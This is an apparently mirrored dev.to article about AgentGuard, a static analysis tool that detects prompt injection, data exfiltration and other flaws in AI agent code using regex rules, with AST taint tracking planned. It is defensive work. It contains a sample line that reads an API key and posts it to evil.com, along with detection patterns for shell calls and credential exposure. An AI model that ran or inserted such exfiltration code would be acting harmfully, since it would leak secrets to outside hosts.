cd /news/ai-safety/beyond-regex-building-detection-rule… · home topics ai-safety article
[ARTICLE · art-42735] src=dev.to ↗ pub= topic=ai-safety verified=true sentiment=↑ positive

Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

AgentGuard, an open-source static analysis tool for AI agent vulnerabilities, uses regex-based rules to detect prompt injection and other flaws in source code. Its creator, Dockfix Labs, is developing AST-based semantic analysis to track taint flow and catch subtle patterns like data exfiltration. The tool currently covers 10 vulnerability categories and aims to make AI agent code as auditable as web application code.

read2 min views1 publishedJun 28, 2026

When I started building AgentGuard, the first question was: how do you detect a prompt injection vulnerability in source code?

Unlike traditional vulnerabilities (SQL injection, XSS), prompt injection doesn't have a single signature. It's a pattern of untrusted data flowing into LLM context. The vulnerability isn't in a function call -- it's in how data is constructed.

Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:

FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I
)

This catches the most common pattern: f-strings that embed user input directly into LLM prompts. It is blunt but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances.

Regex has limits. Consider:

prompt = f"You are a helper. {user_input}"

template = "You are a helper. {input}"
prompt = template.format(input=user_data)

messages = [{"role": "system", "content": config["system_prompt"] + user_message}]

Pattern A is trivial to detect. Pattern B requires understanding .format()

semantics. Pattern C requires tracking data flow through dictionaries and list construction.

This is where AgentGuard is headed next: AST-based semantic analysis.

The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:

user_input

, query

, message

, request.body

openai.chat.completions.create

, prompt

, messages

, system

This is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.

AgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):

api_key = os.environ.get("API_KEY")

requests.post("https://evil.com/collect", headers={"Auth": api_key})

The rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally.

Future versions will extend this to full function-level taint tracking.

AgentGuard currently covers all 10 categories:

ASI Rule Detection Method
ASI01 Prompt Injection Regex (f-string, concat, format)
ASI02 Tool Abuse Regex (os.system, subprocess, eval)
ASI03 Data Exfiltration Regex + cross-line correlation
ASI04 Excessive Agency Regex (auto-execute, no-confirm)
ASI05 Supply Chain Regex (untrusted pip install, dynamic import)
ASI06 Insecure Output Regex (raw HTML, eval output)
ASI07 Credential Exposure Regex (API keys, private keys, passwords)
ASI08 Context Manipulation Regex (context stuffing, token bombing)
ASI09 Agent Loop Exploitation Regex (recursive calls, no depth limit)
ASI10 Trust Boundary Regex (mixed privilege, cross-agent calls)

The benchmark suite has 28 samples:

The long-term goal is simple: make AI agent code as auditable as web application code. We have Semgrep for web apps. We need AgentGuard for agent apps.

AgentGuard is MIT-licensed and open source. Install with pip install dfx-agentguard

.

── more in #ai-safety 4 stories · sorted by recency
── more on @agentguard 3 stories trending now
sponsored brought to you by zahid.host 4,200+ EU-deployed projects
reading about agents? ship yours in a single git push.

Run your AI side-project on zahid.host

EU-based hosting, git-push deploys, automatic HTTPS, no cold starts. Free tier with a custom domain — perfect for shipping the agent you just read about.

$git push zahid main
Live at https://your-agent.zahid.host
Get free account → Pricing
from €0/mo · no card required
LIVE [news/beyond-regex-buildin…] indexed:0 read:2min 2026-06-28 ·